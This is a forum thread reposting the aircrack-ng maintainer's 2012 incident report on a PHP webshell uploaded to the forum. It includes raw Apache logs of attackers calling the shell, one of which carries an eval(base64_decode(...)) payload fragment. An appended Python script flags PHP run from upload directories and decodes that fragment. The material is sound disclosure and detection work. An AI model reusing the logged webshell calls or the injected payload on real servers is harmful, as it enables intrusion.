Crack-wifi.com FORUM

THE SITE'S FORUM

Wifi, Backtrack, WEP and WPA cracking...


#1 30-05-2012 03:23:27

[email protected] (Mister_X)
Guest

Re : [Aircrack-ng] Forum virus details

Hi,

as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.

The virus is also known by Sophos as Mal/Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data'. It's a piece of PHP called rbvzv.php (1418 bytes) that has a payload encoded in base64. Then it is passed to the JavaScript function eval() which is going to execute it.
If any of you guys are interested in the piece of code, let me know, I can send you a copy; I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it. I can read Javascript but the problem is that it's not plain Base64.

I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges (user without bash, etc).

For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"

As you can see, the file was created by that first guy, 91.224.160.132 and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r--  1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php

Unfortunately, I don't think I can do anything against those guys, a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): IP in the Netherlands but the person to contact lives in the Virgin Islands. Anyway, I sent them an email and we'll see if they answer.

As far as I know, it is limited to the forum and nothing else. The attacker didn't get on the server or install any backdoor.

So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum (and check the apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly and when.
The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated.


So, to summarize: it happened a day before I got the email letting me know there is a virus. It happened May 22 at 23h12 (11.12pm) and I stopped it on May 24, around 14h00 (2pm).
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.

http://aircrack-ng.blogspot.com/2012/05 … tails.html
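As an added example (not part of the post above nor of aircrack-ng), the following Python triage script applies the post's own reasoning to Apache combined-format log lines: it flags PHP being executed under the forum's upload directory and requests that carry eval()/base64_decode() in the query, groups hits by source address with the first-seen timestamp (the way the post matches the file's creation time to the first IP), and restores padding on the truncated base64 fragment from the last log line so its readable prefix can be inspected. The STATIC_ONLY_DIRS list and the 203.0.113.5 line are assumptions/constructed; the other two sample lines are copied from the post with shortened user-agent strings.

```python
import base64
import re
from urllib.parse import unquote
LOG_RE = re.compile(  # Apache "combined" format, as in the post's excerpt
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
STATIC_ONLY_DIRS = ("/data/",)  # upload dirs that must never execute PHP (assumption, after the post's 'data')
B64_RE = re.compile(r"base64_decode\('([A-Za-z0-9+/=]+)")
# Sample input: two lines copied from the post (UA strings shortened) plus one constructed benign request.
SAMPLE_LOG = """\
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0"
203.0.113.5 - - [24/May/2012:16:02:11 +0200] "GET /index.php?action=search HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (constructed)"
"""
def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def decode_b64_fragment(fragment):
    """Decode a possibly truncated base64 blob: restore padding so the readable prefix survives."""
    raw = fragment.rstrip("=")
    if len(raw) % 4 == 1:  # a lone trailing sextet carries no complete byte
        raw = raw[:-1]
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw).decode("latin-1")

def flags(entry):
    """Indicators that make one request worth a look."""
    target = unquote(entry["target"])
    path = target.split("?", 1)[0]
    reasons = []
    if path.endswith(".php") and path.startswith(STATIC_ONLY_DIRS):
        reasons.append("php executed in upload directory")
    if "eval(" in target or "base64_decode(" in target:
        reasons.append("code-execution primitives in request")
    return reasons

def triage(log_text):
    """Group flagged requests by source IP: first sighting, hit count, decoded inline payload."""
    report = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry or not (reasons := flags(entry)):
            continue
        rec = report.setdefault(entry["ip"], {"first_seen": entry["ts"], "hits": 0, "reasons": set(), "payload": None})
        rec["hits"] += 1
        rec["reasons"].update(reasons)
        if m := B64_RE.search(unquote(entry["target"])):
            rec["payload"] = decode_b64_fragment(m.group(1))
    return report
```

Running triage(SAMPLE_LOG) reports only the two attacker addresses, and the decoded prefix of the fragment shows the uploaded script beginning with error_reporting/set_time_limit/ignore_user_abort calls before it is cut off.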


#2 30-05-2012 04:42:51

Fuji
Irreplaceable Member
Location: Saint Script-sur-Shell
Registered: 13-12-2010
Posts: 783

Re : [Aircrack-ng] Forum virus details

So it really was an attack.

aircrack-ng forum and svn repositories down! sad

